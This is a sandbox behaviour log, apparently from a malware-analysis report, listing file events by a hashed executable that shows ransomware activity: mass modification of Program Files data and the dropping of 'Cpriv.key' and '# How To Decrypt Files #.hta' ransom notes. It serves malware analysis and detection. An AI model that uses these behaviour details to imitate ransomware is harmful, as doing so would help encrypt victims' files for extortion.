de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FORM.JS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Media Player\Icons\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\1047x576black.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SpringGreen\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187837.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\ONENOTE_COL.HXC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR51B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-spi-actions.xml_hidden de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01191_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\PROOF\1036\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\4.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145168.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200521.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02291U.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\drag.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-compat.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00204_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Foundry.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_FormsHomePageSlice.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\COMPASS\COMPASS.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\DEEPBLUE\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01152_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL081.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Services\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\WhiteDot.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SoftBlue\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-first-quarter.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\QUAD\QUAD.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME10.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\manifest.json de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21326_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\AccessWeb\SERVWRAP.ASP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0299587.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115836.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0278882.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105272.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB00531L.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18229_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\pt-BR.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\ja-jp.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\System\msadc\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD06200_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\d3d11\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\core_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OCRVC.DAT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\OUTLOOK.DEV_K_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\OUTLOOK.HXS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\Sounds\Places\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FORM.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-highlight.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.bidi_0.10.0.v20130327-1442.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-charts.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\CATALOG.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\play_rest.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\cs-CZ\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\startNetworkServer.bat de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02071U.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR7F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\Certificates\groove.net\Servers\Management.cer de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\SUBMIT.JS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsBrowserUpgrade.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\pt-br.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04206_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waning-crescent_partly-cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\en-US\js\cpu.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\SpeechEngines\Microsoft\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_MoveNoDrop32x32.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\WINWORD.HXS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\vi\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_left_hover.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme_0.9.300.v20140424-2042.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\specialoccasion.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgePackages.h de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\OOFS.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SpringGreen\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\my\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rss_headline_glow_floating.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\RMNSQUE\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\VSTO\vstoee100.tlb de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Mozilla Firefox\uninstall\uninstall.log de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_image-frame-ImageMask.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\stopNetworkServer.bat de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR4F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\sr-spc.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\TextConv\WPFT532.CNV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105282.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\ACTIP10.HLP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\DEEPBLUE\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\invalid32x32.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0149407.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL108.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\21.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Mozilla Maintenance Service\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\en-US\js\clock.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01470_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01238_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Stationery\1033\TECHTOOL.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Sync Framework\v1.0\Documentation\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waxing-gibbous.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\SPRING\SPRING.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10268_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00018_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\MeetingIconMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\Gadget_Flyout_Thumbnail_Shadow.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Internet Explorer\SIGNUP\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\BLUEPRNT\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115834.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Triedit\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\EXPEDITN\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198025.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Executive.eftx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR36F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\XLSTART\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\ECLIPSE\ECLIPSE.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00265_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\time-span-16.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-uihandler_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Access\Part\1 Right.accdt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\uk\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\vlm.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_double_orange.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.util_1.0.500.v20130404-1337.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.commands.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.preferences_3.5.200.v20140224-1527.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\sound.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\RE00006_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\FLYER.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\PS10TARG.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\LAYERS\LAYERS.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.annotation_1.2.0.v201401042248.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rssBackBlue_Undocked.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00037_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198447.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationRight_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\sl\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Reference 